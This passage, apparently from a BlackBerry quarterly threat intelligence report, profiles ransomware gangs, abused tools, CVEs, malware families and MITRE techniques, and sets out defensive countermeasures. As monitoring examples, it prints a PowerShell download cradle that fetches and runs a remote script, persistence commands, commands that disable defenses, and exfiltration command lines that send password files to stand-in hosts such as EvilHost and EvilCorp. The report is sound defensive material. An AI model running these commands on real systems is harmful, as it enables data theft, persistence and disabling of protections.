- Other notable targets include the town of Cedar Falls in Iowa; an American multinational software company; the Kansas City Kansas Police Department; and global pharmaceutical company Octapharma Plasma, Inc.
-
BlackBasta
BlackBasta (aka Black Basta) is a ransomware operator and Ransomware-as-a-Service (RaaS) criminal enterprise that surfaced in early 2022. According to a joint report by CISA and the FBI, BlackBasta affiliates have targeted over 500 private industry and critical infrastructure entities, including healthcare organizations, across North America, Europe and Australia.
BlackBasta employs typical initial access methods, including phishing and exploiting known vulnerabilities. After gaining access, adversaries conduct reconnaissance to map the target network and dump credentials using Mimikatz. Using the harvested credentials, ransomware operators escalate privileges and move laterally to compromise the network. Prior to encryption, BlackBasta threat actors disable defenses, exfiltrate sensitive information and delete shadow volume copies to remain hidden until the final strike. The group is known to employ double extortion tactics, encrypting critical data and vital servers and threatening to publish sensitive information on their public leak site.
Targets this reporting period include:
- A prominent U.S. healthcare provider. BlackBasta encrypted the provider’s patient data and its operational systems, compromising patient care and data privacy.
- Keytronic, a U.S. manufacturer. A BlackBasta-attributed cyberattack disrupted its operations and restricted access to essential business applications. Additionally, the company suffered a data breach when the ransomware gang leaked the stolen data.
These attacks highlight BlackBasta’s continued focus on high-value targets across various sectors, employing sophisticated ransomware tactics to maximize their disruption and extortion potential.
-
LockBit
LockBit, a cybercriminal group with alleged affiliations to Russia, specializes as a RaaS provider through its eponymous malware. The group’s operators diligently maintain and enhance the ransomware, overseeing negotiations and orchestrating its deployment once a successful breach happens. LockBit employs a double extortion strategy that not only encrypts the local data to restrict victim access, but also exfiltrates sensitive information, threatening public data exposure unless a ransom is paid.
Operation Cronos, an international cybercrime taskforce, severely disrupted LockBit in February. However, the group remained highly active and was the most aggressive in targeting EMEA organizations this quarter. Targets include:
- Localized critical infrastructure. In EMEA, LockBit has largely targeted en masse SMBs, mostly in the United Kingdom, Germany and France. The group primarily focuses on small-scale critical infrastructure targets related to education, healthcare and the public sector.
- Hôpital de Cannes - Simone Veil, in France. A LockBit attack led to severe operational disruptions, compelling the hospital to take all computers offline and reschedule non-emergency procedures and appointments.
- Wichita, the largest city in Kansas with a population of 400,000. This significant ransomware attack forced the city to take its computer systems offline, causing widespread disruption. LockBit publicly posted a ransom deadline on their website, increasing pressure on the city’s administration to comply with their demands.
-
ShinyHunters
ShinyHunters is a threat group that first emerged in 2020, and it is known for several data breaches across multiple industries. Their attacks reportedly include those against Indonesian e-commerce company Tokopedia, as well as GitHub and Pizza Hut Australia. ShinyHunters has offered stolen data for sale on forums, occasionally leaking data from some breaches for free. Ironically, the group often finds vulnerabilities through code available in GitHub repositories. It scours unsecured cloud buckets, abuses stolen credentials and leverages phishing attacks to facilitate their breaches.
Other alleged targets for this reporting period include:
- Banco Santander S.A., a Spanish bank serving customers across Latin America, the U.S., the U.K. and Spain. ShinyHunters put data from this breach up for sale for approximately U.S. $2 million, impacting 30 million customers and employees.
- A multinational entertainment ticket sales and distribution company. Their customers had their data stolen via an account on Snowflake, an AI data cloud used by the company. The account lacked multi-factor authentication, which enabled the threat group’s access. ShinyHunters offered to sell this data for U.S. $500,000.
-
Akira
Akira ransomware was first observed in March 2023 and quickly gained notoriety due to its wide-ranging attacks across various sectors. The group’s operations have been characterized by a series of high-profile attacks and a persistent presence in the ransomware landscape. Akira is particularly known for its use of double extortion tactics, where it not only encrypts data but also threatens to leak the stolen data if the ransom is not paid. This approach has proven effective in compelling victims to meet their demands.
Initially focused on Windows systems, Akira has since expanded its operations to include a Linux variant. The group employs common initial access methods, including phishing campaigns and exploiting known vulnerabilities. Akira also utilizes publicly available tools such as Mimikatz and LaZagne for credential access, PsExec for remote execution and AnyDesk or Radmin for remote access.
Akira operates as a RaaS, was initially developed in C++, and uses an .akira extension for encrypted files. A Rust-based variant has also been observed, which uses the .powerranges extension. Akira’s most recent activities have targeted the healthcare, financial services, manufacturing and technology sectors. These attacks highlight the group’s adaptability and continued threat to a broad range of industries.
-
Tools
Tools like Rclone, Rubeus, GMER, WinSCP and Cobalt Strike are vital in data management, penetration testing and system maintenance. Their flexibility and accessibility also make them useful tools to be misused by threat actors.
-
Rclone
Rclone is a command line program that facilitates the syncing, copying, moving or mirroring of data between a local machine and remote storage. Rclone provides backends that can support several open source and proprietary services and platforms, including HTTP, FTP or SMB, as well as Google Drive, MEGA, Dropbox and others. This flexibility makes Rclone practical for the legitimate user, but it also makes it ideal for threat actors looking for a means to exfiltrate data to their cloud service. It has been used by many ransomware actors over the years, including some that were active this quarter such as Akira, BlackBasta and LockBit. -
Rubeus
Rubeus is an open-source tool adapted from Benjamin Delpy’s well-known Kekeo project, and is used for raw Kerberos interactions and abuse, including ticket retrieval and renewal, constrained delegation abuse, ticket forgery, management, exfiltration, harvesting and kerberoasting. It is now frequently used by malicious actors as part of larger attack frameworks and integrates with tools like Sliver C2, which supports cross-platform implants and multiple communication protocols. -
GMER
GMER is an application designed to detect and remove rootkits by scanning for hidden processes, threads, modules, services, files and registry keys. It also performs inline hooking and hooks into the Interrupt Descriptor Table (IDT), System Service Descriptor Table (SSDT) and Input/Output Request Packet (IRP) calls. While GMER is typically a benign tool used for detecting and removing harmful kernel drivers, it has also been exploited to bypass security measures. For instance, both the Play and BlackSuit ransomware groups have used GMER to neutralize security defenses and ensure payload execution without interference. -
WinSCP
Windows Secure Copy (WinSCP) is a free open-source client for SFTP, FTP, WebDAV and SCP protocols, designed for Microsoft Windows. It facilitates secure file transfers between local and remote computers, leveraging encrypted protocols like SFTP to ensure data security. However, its capabilities also make it a tool of choice for threat actors. Attackers can use WinSCP to stealthily exfiltrate large volumes of data, upload malware to target servers for further system compromise and gain remote access to execute arbitrary commands, or deploy additional malicious software, maintaining persistent control over compromised systems. -
Cobalt Strike
Cobalt Strike serves as a sophisticated adversary simulation framework meticulously engineered to replicate the persistent presence of threat actors within network environments. Structured around two pivotal components — an agent (Beacon) and a server (Team Server) — Cobalt Strike orchestrates a seamless interaction. The Cobalt Strike Team Server, functioning as a long-term C2 server hosted on the Internet, maintains constant communication with Beacon payloads deployed on victim machines.
While Cobalt Strike is primarily utilized as a tool for penetration testers and red teamers to assess the security posture of networks, it has unfortunately also been exploited by malicious threat actors. Despite its intended purpose, instances of its code being leaked online have occurred, leading to rapid weaponization by a diverse array of adversaries. This dual nature highlights the importance of vigilance and robust cybersecurity measures to mitigate the risks associated with its misuse, safeguarding networks from potential exploitation.
Cyber Story Highlight: Emerging Ransomware Group – Space Bears
In a cyberthreat landscape saturated with ransomware gangs, targeting legitimate organizations remains lucrative for cybercriminals. New groups frequently emerge or spin off from old gangs, often starting operations with a new or improved ransomware strain and modus operandi that typically follows tried and tested methods from past threat actors.
One such group that emerged this reporting period is Space Bears, known for their slick and polished leak site. Some researchers suggest they may have links with the Phobos RaaS operators.
Who Are the Space Bears?
Like most ransomware gangs today, Space Bears employ a double extortion method. Upon gaining entry to a victim’s network, they first exfiltrate and then encrypt sensitive data, putting pressure on the victim to pay a ransom. Space Bears may threaten to publicly post the data on the Internet if the ransom isn’t paid.
References to the stolen data are posted on their leak site, located at an “.onion” address on the deep web. The Tor Project, commonly called “The Onion Router,” is an open-source privacy tool that keeps the user’s online activity anonymous and secure. The victim is named and shamed on this leak site, with a countdown timer displayed until the release of the data, should they not pay the ransom within the specified time limit. Since becoming active in mid-April, this group has already targeted over 20 victims across various global industries.
Space Bears Target Industries and Geolocations
Common Vulnerabilities and Exposures
Notable Common Vulnerabilities and Exposures (CVEs) provide a framework for identifying, standardizing and publicizing known security vulnerabilities and exposures. Almost 12,011 new CVEs were reported by the National Institute of Standards and Technology (NIST) from April through June 2024. This is nearly a 35% increase in disclosed vulnerabilities over a similar time period in January to March 2024.
May holds the record so far this year for the most newly discovered CVEs, with close to 5,103 new CVEs, breaking all noted figures from the first quarter of the year. These include:
Palo Alto PAN-OS RCE
CVE-2024-3400 (10.0 Critical) Arbitrary Code Execution
According to Palo Alto, this issue is applicable to PAN-OS 10.2, PAN-OS 11.0 and PAN-OS 11.1 firewalls configured with GlobalProtect gateway or GlobalProtect portals. The CVE relates to command injection as a result of an arbitrary file creation vulnerability in the GlobalProtect feature of Palo Alto Networks PAN-OS software. This vulnerability could potentially enable an unauthenticated attacker to execute arbitrary code with root privileges on the firewall. Given this potential, the CVE was given the highest critical score.
PyTorch Framework Vulnerably RCE
CVE-2024-5480 (10.0 Critical) Arbitrary Code Execution
A vulnerability in the PyTorch’s ‘torch.distributed.rpc’ framework, specifically in versions prior to 2.2.2, allows for remote code execution (RCE). This vulnerability permits attackers to execute arbitrary commands by leveraging built-in Python functions.
Quantum Gateway Information Disclosure
CVE-2024-24919 (8.6 High) Authentication Bypass
Perimeter network devices like VPNs are prime targets for both hackers and advanced state sponsors. Check Point™ published a zero-day advisory on May 28, 2024, warning customers that a vulnerability in its Security Gateways can allow attackers to access sensitive information and gain domain privileges. This vulnerability enables hackers to move laterally and gain further network privileges. In a statement, Check Point noted there had been a number of unauthorized access attempts, with thousands of potential devices affected by the flaw.
Prevalent Threats by Platform: Windows
Infostealer
Lumma Stealer is a C-based infostealer that focuses on exfiltrating private and sensitive data from the victim’s device, including cryptocurrency wallet data and two-factor authentication (2FA) browser extension data.
Downloader
GuLoader (aka CloudEyE) is encrypted shellcode wrapped in Visual Basic 5 or 6 to download additional payloads of various types.
Infostealer
Agent Tesla is a .NET based trojan that is often seen sold as MaaS and is used primarily for credential harvesting.
Infostealer
RisePro uses a number of distribution methods to gain access to victims’ devices and collect sensitive data to send back to a C2 server.
Infostealer
RedLine Stealer uses a wide range of applications and services to collect victim information such as passwords, cookies and credit card information.
Remote Access Trojan
Remcos, short for remote control and surveillance, is an application used to remotely access a victim’s device.
Remote Access Trojan
DCRat is a remote access trojan that steals victim information and executes commands from a C2 server. DCRat has been observed being distributed via Signal.
Botnet
Amadey is a botnet that collects victim information and waits for commands from a C2 server to download additional payloads.
Prevalent Threats by Platform: Linux
Trojan
The trojan XorDDos maintains its prevalence in our telemetry this reporting period. Using XOR encryption to control access to communication and execution data, XorDDos infects Linux-based devices and controls them as a singular botnet via C2 instructions.
Backdoor
BPFDoor is a Linux backdoor which utilizes a Berkeley Packet Filter (BPF) sniffer to intercept and modify network traffic. BPFDoor has been used as a passive surveillance tool by the threat actor group Red Menshen due to its ability to bypass firewalls and remain undetected. New variants of BPFDoor have adopted reverse shell communication and bolstered encryption.
Botnet
Mirai has been detected utilizing an authentication bypass flaw to gain access to endpoints, along with a command injection vulnerability to deliver and deploy the botnet and take over vulnerable devices.
Botnet
Bashlite, also known as Gafgyt, is another Linux botnet which uses C2 servers to send instructions to be carried out by its infected devices. It has been documented targeting Internet of Things (IoT) devices such as routers, which it uses to coordinate large scale DDoS attacks against targets.
Coinminer
XMRig continues to be a popular tool for mining cryptocurrency such as Monero due to its high performance and open-source nature. It is often deployed by threat actors once initial access to a system has been gained and used to mine crypto without the victim’s knowledge.
Prevalent Threats by Platform: macOS
Stealer
Discovered and named by Kandji’s threat research team in April, Cuckoo Stealer is distributed as a malicious disk image (DMG) file which contains spyware and infostealer capabilities. Since its discovery, Cuckoo Stealer has seen a sharp rise in new samples of the malware appearing in the wild.
Stealer
Atomic Stealer (aka AMOS) remains prevalent with many new variants spotted in the wild. The new variants disguise themselves as various apps which are distributed via disk images. AMOS is a stealer which targets passwords, browser cookies, autofill data, crypto wallets and Mac keychain data.
Backdoor
A malicious attack which utilizes the Python Package Index (PyPI) has been discovered by researchers. The malware utilizes the PyPI library to install a Sliver C2 payload on the target machine. The package is written in the Go programming language and uses steganography in a Portable Networks Graphic (PNG) file to carry out the attack.
Stealer
This malware spreads by utilizing malicious Google ads for the Arc web browser. These ads trick the victim into downloading a malicious DMG installer file which begins the infection process, dropping the malware to the machine. Poseidon has the ability to harvest user credentials, VPN configurations and cryptocurrency wallets.
Prevalent Threats by Platform: Android
Infostealer
This infostealer utilizes the Android Accessibility Service to capture user data and send captured data to its C2 server. SpyNote includes the functionality to click/long-click, take screenshots and lock the victim’s screen.
Backdoor/Ransomware
Rafel RAT is distributed as a trojan application or through phishing campaigns. Its capabilities include C2, location tracking, redirect device notifications, and extracting personal SMS messages and call logs from the target device.
Infostealer
SoumniBot steals banking keys and plunders victims’ bank accounts. The malware exploits a validation issue in the Android manifest and steals information that it uploads to a remote server.
Infostealer
Vultur has been distributed through trojan applications and “smishing” (SMS phishing) social engineering techniques. In addition to data exfiltration, a threat actor can use Vultur to make changes to the file system, modify execution permissions, and control the infected device using Android Accessibility Services.
Common MITRE Techniques
Understanding threat groups’ high-level techniques can aid in deciding which detection techniques should be prioritized. BlackBerry observed the following top 20 techniques being used by threat actors in this reporting period.
Detected Techniques
The following table shows the top 20 techniques. An upward arrow (↑) in the “change” column indicates that usage of the technique has increased since our last report. A downward arrow (↓) indicates that usage has decreased since our last report. An equals (=) symbol means that the technique remains in the same position as in our last report.
Technique Name | Technique ID | Tactic Name | Last Report | Change |
---|---|---|---|---|
Hijack Execution Flow
|
T1574
|
Persistence, Privilege Escalation, Defense Evasion
|
NA
|
↑
|
DLL Side-Loading
|
T1574.002
|
Persistence, Privilege Escalation, Defense Evasion
|
3
|
↑
|
Process Injection
|
T1055
|
Privilege Escalation, Defense Evasion
|
1
|
↓
|
Input Capture
|
T1056
|
Credential Access, Collection
|
4
|
=
|
System Information Discovery
|
T1082
|
Discovery
|
2
|
↓
|
Software Discovery
|
T1518
|
Discovery
|
NA
|
↑
|
Security Software Discovery
|
T1518.001
|
Discovery
|
5
|
↓
|
Process Discovery
|
T1057
|
Discovery
|
8
|
↓
|
File and Directory Discovery
|
T1083
|
Discovery
|
7
|
↓
|
Masquerading
|
T1036
|
Defense Evasion
|
6
|
↓
|
Application Layer Protocol
|
T1071
|
Command-and-control
|
9
|
↓
|
Non-Application Layer Protocol
|
T1095
|
Command-and-control
|
11
|
↓
|
Remote System Discovery
|
T1018
|
Discovery
|
12
|
↓
|
Boot or Logon Autostart Execution
|
T1547
|
Persistence, Privilege Escalation
|
NA
|
↑
|
Registry Run Keys / Startup Folder
|
T1547.001
|
Persistence, Privilege Escalation
|
10
|
↓
|
Application Window Discovery
|
T1010
|
Discovery
|
13
|
↓
|
Impair Defenses
|
T1562
|
Defense Evasion
|
NA
|
↑
|
Disable or Modify Tools
|
T1562.001
|
Defense Evasion
|
17
|
↓
|
Scheduled Task/Job
|
T1053
|
Execution, Persistence, Privilege Escalation
|
15
|
↓
|
Data from Local System
|
T1005
|
Collection
|
NA
|
↑
|
Technique ID | |
---|---|
Hijack Execution Flow |
T1574
|
DLL Side-Loading |
T1574.002
|
Process Injection |
T1055
|
Input Capture |
T1056
|
System Information Discovery |
T1082
|
Software Discovery |
T1518
|
Security Software Discovery |
T1518.001
|
Process Discovery |
T1057
|
File and Directory Discovery |
T1083
|
Masquerading |
T1036
|
Application Layer Protocol |
T1071
|
Non-Application Layer Protocol |
T1095
|
Remote System Discovery |
T1018
|
Boot or Logon Autostart Execution |
T1547
|
Registry Run Keys / Startup Folder |
T1547.001
|
Application Window Discovery |
T1010
|
Impair Defenses |
T1562
|
Disable or Modify Tools |
T1562.001
|
Scheduled Task/Job |
T1053
|
Data from Local System |
T1005
|
Tactic Name | |
---|---|
Hijack Execution Flow |
Persistence, Privilege Escalation, Defense Evasion
|
DLL Side-Loading |
Persistence, Privilege Escalation, Defense Evasion
|
Process Injection |
Privilege Escalation, Defense Evasion
|
Input Capture |
Credential Access, Collection
|
System Information Discovery |
Discovery
|
Software Discovery |
Discovery
|
Security Software Discovery |
Discovery
|
Process Discovery |
Discovery
|
File and Directory Discovery |
Discovery
|
Masquerading |
Defense Evasion
|
Application Layer Protocol |
Command-and-control
|
Non-Application Layer Protocol |
Command-and-control
|
Remote System Discovery |
Discovery
|
Boot or Logon Autostart Execution |
Persistence, Privilege Escalation
|
Registry Run Keys / Startup Folder |
Persistence, Privilege Escalation
|
Application Window Discovery |
Discovery
|
Impair Defenses |
Defense Evasion
|
Disable or Modify Tools |
Defense Evasion
|
Scheduled Task/Job |
Execution, Persistence, Privilege Escalation
|
Data from Local System |
Collection
|
Last Report | |
---|---|
Hijack Execution Flow |
NA
|
DLL Side-Loading |
3
|
Process Injection |
1
|
Input Capture |
4
|
System Information Discovery |
2
|
Software Discovery |
NA
|
Security Software Discovery |
5
|
Process Discovery |
8
|
File and Directory Discovery |
7
|
Masquerading |
6
|
Application Layer Protocol |
9
|
Non-Application Layer Protocol |
11
|
Remote System Discovery |
12
|
Boot or Logon Autostart Execution |
NA
|
Registry Run Keys / Startup Folder |
10
|
Application Window Discovery |
13
|
Impair Defenses |
NA
|
Disable or Modify Tools |
17
|
Scheduled Task/Job |
15
|
Data from Local System |
NA
|
Change | |
---|---|
Hijack Execution Flow |
↑
|
DLL Side-Loading |
↑
|
Process Injection |
↓
|
Input Capture |
=
|
System Information Discovery |
↓
|
Software Discovery |
↑
|
Security Software Discovery |
↓
|
Process Discovery |
↓
|
File and Directory Discovery |
↓
|
Masquerading |
↓
|
Application Layer Protocol |
↓
|
Non-Application Layer Protocol |
↓
|
Remote System Discovery |
↓
|
Boot or Logon Autostart Execution |
↑
|
Registry Run Keys / Startup Folder |
↓
|
Application Window Discovery |
↓
|
Impair Defenses |
↑
|
Disable or Modify Tools |
↓
|
Scheduled Task/Job |
↓
|
Data from Local System |
↑
|
Using MITRE D3FEND™, the BlackBerry Threat Research and Intelligence Team has developed a complete list of countermeasures for the techniques observed during this reporting period, which is available in our public GitHub. Adversaries use the top three most well-known techniques to gather key information to conduct successful attacks. In the Applied Countermeasures section, we discuss some examples of their usage and useful information to monitor. The impact rating of the total of techniques and tactics can be seen in this figure.
Detected Tactics
In this reporting period, there are two tactics with the same percentage of observations, Privilege Escalation and Defense Evasion, with 23%, followed by Discovery with 19%. These are the same top tactics from the previous period.
-
Applied Countermeasures
The BlackBerry Research and Intelligence Team analyzed five of the most observed MITRE Techniques:
-
Hijack Execution Flow – T1574
Hijack Execution Flow (T1574) is a sophisticated technique employed by adversaries to intercept and manipulate the normal execution flow of a system, allowing them to execute malicious code instead. This method was found to be very prevalent in the last quarter, showcasing its popularity due to its effectiveness in achieving persistence and executing unauthorized actions.
There are multiple routes of leveraging the methods under this technique, including DLL search order hijacking, DLL side-loading, and injecting malicious code into legitimate processes. By hijacking the execution flow, attackers can gain control over the system without triggering standard security alerts. This makes it challenging for security tools to detect and prevent future activities by the threat actor. For instance, by placing a malicious DLL in a location that gets searched before the legitimate one, the attacker can ensure their code gets executed when a legitimate application loads the DLL.
One significant advantage of this technique for adversaries is its ability to bypass security measures. Since the malicious code is executed in the context of a trusted process, it can evade traditional security mechanisms that rely on process behavior analysis. This capability makes Hijack Execution Flow particularly dangerous, as it can be used to perform a wide range of malicious activities, from privilege escalation to data exfiltration.
To defend against T1574, organizations should implement comprehensive security measures, including application whitelisting, rigorous patch management, and continuous monitoring of system and network activities. Regularly updating software and ensuring that only authorized applications can run significantly reduces the risk of execution flow hijacking.
User awareness training also plays a vital role in helping employees recognize signs of potential execution flow hijacking attempts, contributing to a robust security posture. Finally, employing advanced threat detection solutions that can identify abnormal behavior patterns associated with this technique is crucial for timely detection and response. Some examples of use of T1574 include:
- DLL Search Order Hijacking: A common example is the exploitation of the DLL search order in Windows. If an attacker places a malicious msvcrt.dll in the application’s working directory, it may be loaded by the application instead of the legitimate version from the system directory.
- DLL Side-Loading: In 2018, the APT group OceanLotus used DLL side-loading with the legitimate Microsoft Word executable to load a malicious DLL that established persistence and executed further payloads.
- COM Hijacking: An attacker registers a malicious COM object under a specific registry key that a legitimate application frequently queries. When the application calls the COM object, the malicious code is executed instead of the intended COM object.
- Windows AppInit_DLLs: By modifying the registry keys like AppInit_DLLs, an attacker ensures their malicious DLL is loaded into all applicable processes, granting them control over these processes.
- Injection into Legitimate Processes: A known case is this technique involves the use of reflective DLL injection by the Cobalt Strike tool, where the payload is injected into a legitimate process to evade detection by security software.
-
Boot or Logon Autostart Execution – T1547
In the Boot or Logon Autostart Execution (T1547) technique, an attacker first ensures that the malware runs automatically during system startup or user login. Then the attacker uses mechanisms such as registry keys, startup folders, scheduled tasks, or service registrations to maintain persistence or to gain elevated privileges on the compromised system. These mechanisms are designed to facilitate legitimate software functionality and system management tasks on the operating system. However, adversaries can abuse these functions to embed their malicious code, thus helping it to blend in with normal system operations. Understanding and securing these critical operating system mechanisms is essential for protecting against unauthorized persistence and privilege escalation.
Here is an example of a registry key location frequently used to establish persistence:
‘HKLM\Software\Microsoft\Windows\CurrentVersion\Run’ – This is the Windows registry used to configure programs to run automatically when the operating system starts.
An example of a Startup Folder used to establish persistence is:
‘%APPDATA%\Microsoft\Windows\Start Menu\Programs\Startup’ – This path leads to the Startup Folder, where shortcuts to programs that should start automatically when the user logs on are placed.
The following is an example of how service creation can be leveraged for persistence:
‘sc create Updater binPath= “C:\Windows\malicious[.]exe” start= auto’ – The command utilizes the service utility to create a service named “Updater” that is configured to start automatically at system boot.
Another example of establishing persistence and gaining elevated privileges is through the Windows Task Scheduler:
‘schtasks /create /tn “Updater” /tr “C:\Windows\malicious[.]exe” /sc onlogon /ru SYSTEM’ – The command creates a scheduled task named “Updater” that runs the executable malicious.exe in the specified location every time a user logs on, with the specific task running under the SYSTEM account for elevated privileges.
-
Impair Defenses – T1562
The MITRE technique Impair Defenses (T1562), under the tactic Defense Evasion (TA0005), was recognized as one of the top five most commonly occurring techniques used by adversaries this reporting period. This technique alters elements of a victim’s environment to hinder or disable defensive mechanisms. Adversaries not only impair preventive defenses like firewalls and antivirus (AV) software but also disrupt detection capabilities that defenders use to audit activity and identify malicious behaviors.
When threat actors successfully impair a victim’s defenses, they gain the freedom to attack without being detected. This allows them to inject malicious binaries, which can be used to exploit other MITRE techniques, such as keyloggers, worms, trojans and malicious web shells. These can all lead to ransomware being executed on a machine.
It is crucial to employ protective measures against the MITRE technique T1562 to safeguard your system from such attacks. This technique is often used at the beginning of an attack, making it essential to detect and counteract it as early as possible.
Below is a list of command lines that are useful to monitor:
- sc stop <ServiceName>
- sc config <ServiceName> start=disabled
- net stop <ServiceName>
- taskkill /IM <ToolName> /F
- netsh advfirewall set allprofiles state off
- bcdedit.exe /deletevalue {default} safeboot
- bcdedit /set {default} recoveryenabled no
-
Application Window Discovery – T1010
The Application Window Discovery technique (T1010), under the Discovery tactic (TA0007), was identified by BlackBerry specialists as one of the top techniques used by cyberthreat actors in this reporting timeframe. This technique involves listing open Windows applications, providing threat actors with useful insights into the usage patterns of the target system. This information can be invaluable in identifying specific data worth collecting, as well as the security software that attackers must evade to avoid detection. Threat actors use this technique to better understand the environment and plan their attack to be as aggressive as possible without being detected.
To first get the list of open Windows applications, attackers typically exploit built-in system features. For example, they might utilize commands from the Command and Scripting Interpreter, or functions from the native API to collect the necessary information. These native tools and functions are often used because they are less likely to cause suspicion and can offer comprehensive information about the system.
Given that these behaviors are suspicious and can provide an adversary with significant information about the victim’s system, it is important to have a security software configuration capable of detecting these commands or actions executed by adversaries.
Below is a list of command lines that may be useful to monitor:
- gps | where {$_.mainwindowtitle}
- Get-Process | Where-Object MainWindowTitle
- “cscript.exe”, “rundll32.exe”, “explorer.exe”, “wscript.exe”, “PowerShell.exe”, “pwsh.dll”, “winlogon.exe”, “cmd.exe” being the parent process to the use of these APIs: “user32.dll!GetWindowTextA”, “user32.dll!GetForegroundWindow”, “user32.dll!GetActiveWindow”, “user32.dll!GetWindowTextW”
- tasklist & tasklist /v
-
Software Discovery – T1518
The MITRE ATT&CK framework identifies Software Discovery (T1518) as a key technique under the Discovery tactic (TA0007). This method is frequently used by adversaries to gain insight into the software environment of targeted systems, making it a critical step in many cyberattacks. Software Discovery allows attackers to identify vulnerabilities by determining which applications and versions are installed on a system. This information helps adversaries exploit outdated or unpatched software, plan ways to disable or evade security measures and tailor their attacks for maximum effectiveness.
Common methods for software discovery include using Windows Management Instrumentation (WMI) with commands like wmic “product” get name, version, vendor and PowerShell scripts such as Get-ItemProperty or Get-WmiObject. These methods enable attackers to retrieve detailed software information, query the Windows registry, and identify running processes and associated applications. The implications of successful software discovery are significant. Attackers can exploit identified software vulnerabilities to escalate privileges or execute arbitrary code. They can also disable or circumvent security defenses, increasing the likelihood of operating undetected. Additionally, by understanding the software environment, adversaries can deploy malware specifically targeting discovered applications, enhancing the efficacy and stealth of their attacks.
To protect against this technique, organizations should implement robust monitoring and alerting mechanisms. Monitoring the use of commands and scripts commonly associated with software discovery is essential. Employing advanced threat detection systems that use behavioral analysis can help detect unusual activities. Ensuring all software is up-to-date and patched, limiting the use of administrative tools to authorized personnel, and maintaining comprehensive logs of command execution are also crucial steps.
CylanceMDR Data
This section of the report highlights the top interesting threat detections observed in CylanceMDR customer environments that were targeted by a threat during this reporting period.
CylanceMDR is a subscription-based managed detection and response (MDR) service that provides 24x7 monitoring. It helps organizations stop sophisticated cyberthreats seeking gaps in the customer’s security programs. The BlackBerry MDR team tracked thousands of alerts over this reporting period. Below, we break down the telemetry region-by-region to provide additional insight into the current threat landscape.
CylanceMDR Observations
During this reporting period, similar to the last report, the CylanceMDR team observed that Certutil remained a large detection source for the security operations center (SOC) across all regions.
In the North America/Latin America (NALA) and EMEA regions, we also noticed a trend of activity related to ‘PowerShell Download’ detections. For example, we saw adversaries trying to achieve the MITRE technique Ingress Tool Transfer (T1105) by using download cradles via PowerShell such as powershell.exe -noexit -ep bypass -command IEX((New-Object System.Net.WebClient).DownloadString(‘hxxps://SourceofEvil/test[.]ps1’)).
Additionally, we observed an uptick in Base64 encoded detections which was not as prevalent in our previous report’s findings. Base64 encoding provides a relatively easy way for a threat actor to obfuscate code, disguising malicious code and potentially making it less detectable. However, most seasoned analysts are well aware of the use of Base64 by threat actors, so extra vigilance and detection capabilities are usually incorporated into more mature SOCs to identify this evasion technique.
Of particular interest in the NALA and APAC region, we started to observe some more detections related to ‘Possible Msiexec Abuse via DLL Load’ this reporting period. Msiexec is a command-line utility in Windows that is commonly associated with executing .msi installation packages. Our system detects threat actors trying to abuse Msiexec to proxy execute a malicious DLL payload (MITRE technique T1218.007). An example of a command seen is: ‘C:\windows\system32\msiexec.exe /Z c:\programdata\evil.dll’.
LOLBAS Activity
During this reporting period, we observed the following living-off-the-land binaries, scripts and libraries (LOLBAS) activity:
- Bitsadmin continues to be the highest observed LOLBAS.
- Certutil is a close second and has increased since the last reporting period.
- Regsvr32, MSHTA and MOFCOMP are still being observed but overall represent a low percentage.
Exfiltration Tools
In our previous report, we discussed remote monitoring and management (RMM) tools and how they are often abused by threat actors. RMM tools provide an easy way for an attacker to maintain persistence and ease of access, and also provide a way to easily exfiltrate data from customer environments. In fact, researchers have reported that RMM tools are the fastest growing category for ransomware groups to exfiltrate from victim environments.
Staying on the topic of exfiltration, during this reporting period, CylanceMDR reviewed the most prevalent tools that could be used for exfiltration (not including RMM tools) in our customer environments.
Tools
WinSCP
Description: WinSCP is a file transfer client; PuTTY is a secure shell (SSH) client.
Example Command-Line: winscp.exe scp://test: P@ss123[at]EvilHost[.]com:2222/ /upload passwords.txt /defaults=auto
Note: Commonly used with a Graphical User Interface (GUI)
MITRE ATT&CK ID: T1048
Rclone
Description: Rclone is a command-line utility that is used to manage content on cloud storage (i.e., allowing the transfer of files in the cloud)
Example Command-Line: rclone.exe copy “\\SERVER\passwords\ ftp:EvilCorp\files” -q --transfers 10
MITRE ATT&CK ID: S1040
FileZilla
Description: FileZilla is a well-known file transfer protocol (FTP) tool that can be used across various operating systems.
Example Command-Line: filezilla.exe -u “ftp://test:p@ss1234[at]ftp.test[.]com” -e “put passwords.txt /remote_directory/pass.txt”
MITRE ATT&CK ID: T1071.002
PSCP
Description: PuTTY Secure Copy Protocol (PSCP) is a command-line utility used for transferring files and folders.
Example Command-Line: pscp.exe -P 22 C:\Finances.txt root[at]EvilDomain/tmp
MITRE ATT&CK ID: T1021.004
FreeFileSync
Description: FreeFileSync is a synchronization tool that can be used to manage backups.
Example Command-Line: FreeFileSync.exe google_drive_sync.ffs_batch
Note: The batch file will contain information regarding the file/folder and the location of the GDrive folder e.g., <Left Path=“C:\sensitiveFiles” /> <Right Path=“D:\GoogleDriveFolder” />
MITRE ATT&CK ID: T1567.002
Key Takeaways
The above list of tools is not exhaustive, as there are many variations of tools used for the purpose of exfiltration. Therefore, it is important for organizations to have a strategy to defend against the use of tools that may be used for a malicious purpose.
These strategies may include:
- Data loss prevention (DLP) tools for detecting and preventing the loss, misuse or sharing of sensitive data via a breach, and unauthorized use or exfiltration.
- Encryption at rest and in transit.
- Access controls.
- “Least privilege” settings. Only provide access to what is needed.
- Regularly auditing accounts — e.g., if a user changes a role, they may have access to data they no longer need.
- Network segmentation, for in a breach, well-defined network segments will impede lateral movement and reduce the attack surface.
- Intrusion detection systems to monitor network traffic.
- Applying default-deny approach — only enable as required. For example:
- Blocking the use of USB ports or cloud storage services. (e.g., Using group policy objects (GPO) to disable data transfer on USB ports.)
- Ports should not be exposed publicly to the Internet (i.e., Port 22 (SSH) should not be open outbound to the Internet).
- Reduce overall risk by limiting port, protocol and service use.
- Monitoring outbound traffic patterns, such as:
- Increased traffic outside normal operating hours (deviating from the normal baseline).
- A sudden increase of outbound traffic over port 22 could indicate exfiltration using a tool like pscp.exe.
- As stated above, ports such as 22 should apply a default-deny approach to prevent such risks.
- Placing controls to monitor for outbound attempts on ports or services that have been disabled.
- For example, if a threat actor gains access to a network and attempts to enable these ports or services for use, then such controls will alert the security team.
From a SOC analyst perspective, here are some examples of what analysts should be aware of:
Tool Renaming
Analysts need to be aware of commonly used exfiltration tools and their options and parameters. Using the Rclone example — ‘rclone.exe copy “\\SERVER\passwords\ ftp:EvilCorp\files” -q --transfers 10’ — a threat actor may rename this to something more innocuous like - ‘svchost.exe copy “\\SERVER\passwords\ ftp:EvilCorp\files” -q --transfers 10’.
Data Transfer Volume
